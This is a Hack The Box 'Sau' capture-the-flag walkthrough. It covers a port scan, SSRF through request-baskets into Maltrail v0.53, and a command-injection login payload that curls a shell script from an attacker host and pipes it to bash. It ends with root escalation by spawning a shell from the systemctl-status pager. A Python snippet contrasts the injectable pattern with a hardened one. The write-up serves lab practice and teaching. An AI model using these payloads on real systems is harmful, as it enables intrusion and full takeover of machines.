Hack The Box - Sau Walkthrough

Host is up (0.25s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
55555/tcp open     unknown

Overview:

By exploiting a vulnerability in Maltrail (v0.53), it's possible to achieve remote command execution on the targeted machine. This can further lead to privilege escalation, given a misconfigured sudo permission for the user "puma".

Steps:

1. Basket Creation:

First, create a basket by sending a POST request:

Endpoint: /api/baskets/tron

Payload:

{
  "forward_url": "http://127.0.0.1:80/",
  "proxy_response": true,
  "insecure_tls": false,
  "expand_path": true,
  "capacity": 250
}

Accessing the Basket:

Using any web browser or a tool like curl, navigate to the specific URL where the basket resides:

http://<ip>:55555/tron

Replace <ip> with the actual IP address of the target machine.

  1. Expected Output:

    Upon visiting the mentioned URL, you should be presented with the interface or dashboard of Maltrail, specifically version v0.53. This step is crucial as it confirms that the basket was correctly created and is now pointing to the Maltrail instance. If you don't see Maltrail's interface, it might indicate an error in prior steps or that the application is not running as expected.

  2. What is Maltrail?

    For those unfamiliar, Maltrail is a malicious traffic detection system. Version v0.53, the one exposed here, has known vulnerabilities that the following steps exploit.

2. Crafting a Malicious Basket:

Now, create another basket with the following details:

Endpoint: /api/baskets/tron9001

Payload:

{
  "forward_url": "http://127.0.0.1:80/login",
  "proxy_response": true,
  "insecure_tls": false,
  "expand_path": true,
  "capacity": 250
}

Send a POST request to http://<ip>:55555/tron9001 with a malicious payload:

Payload:

username=;`curl <local_ip>/shell | bash`'

This payload attempts to fetch a shell script from the <local_ip> and execute it, providing remote command execution as the user "puma".
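The bug class behind this step is a shell command line built by string-formatting untrusted form input. The following is an added illustration, not Maltrail's own code: it contrasts that pattern with one that passes the username as a single argv element and adds a detection hook for suspicious input. The logging child is a Python one-liner standing in for `logger`, and the sample username is constructed.

```python
"""Command injection of the kind used against the Maltrail login above.

Added illustration, not Maltrail's own code. unsafe_command() shows the bug
class: untrusted form input spliced into a shell command string, so shell
metacharacters in the username become shell syntax. The hardened path passes
the username as one argv element with shell=False and flags suspicious input
for alerting. The logging child process is a small Python one-liner
(stand-in for logger) so the demo runs anywhere.
"""
import re
import subprocess
import sys

# Constructed sample username: a benign stand-in for the walkthrough's payload.
INJECTED_USERNAME = "alice;`echo INJECTED`"

# Shell metacharacters that have no business in a plain username.
_SHELL_META = re.compile(r"[;&|`$()<>\\\n]")


def looks_like_injection(username: str) -> bool:
    """Detection hook: True when the username carries shell syntax."""
    return bool(_SHELL_META.search(username))


def unsafe_command(username: str, client_ip: str) -> str:
    """Vulnerable pattern (returned for inspection, deliberately never run):
    the command line is assembled by formatting and would go to shell=True."""
    return 'logger -p auth.info -t demo "Failed password for %s from %s"' % (
        username, client_ip)


def safe_argv(username: str, client_ip: str) -> list:
    """Hardened pattern: fixed program and flags, untrusted text as one argv
    element. With shell=False nothing in it is parsed as shell syntax."""
    message = "Failed password for %s from %s" % (username, client_ip)
    # The child echoes its argv[1] back; on a real host this would be
    # ["logger", "-p", "auth.info", "-t", "demo", message].
    return [sys.executable, "-c", "import sys; print(sys.argv[1])", message]


def record_failed_login(username: str, client_ip: str) -> str:
    """Run the hardened command and return what the child actually received."""
    result = subprocess.run(safe_argv(username, client_ip), shell=False,
                            capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    print("would have been shelled out:", unsafe_command(INJECTED_USERNAME, "10.0.0.5"))
    print("child received literally   :", record_failed_login(INJECTED_USERNAME, "10.0.0.5"))
    print("flag for alerting          :", looks_like_injection(INJECTED_USERNAME))
```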

3. Privilege Escalation:

Once you've gained a shell as "puma", run:

sudo -l

The output should be:

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

Now, using the above permission, you can abuse the systemctl command to get a shell with root privileges: `systemctl status` pipes its output through a pager (less), and less lets you spawn a shell from its prompt:

sudo /usr/bin/systemctl status trail.service
!sh

This will provide a root shell, and now you have escalated your privileges to root on the targeted system.

Congrats on making it to the climax of this article! 😉 Thanks for tuning into PornoTron9001. Come back soon, but maybe clear your browser history first. Just in case!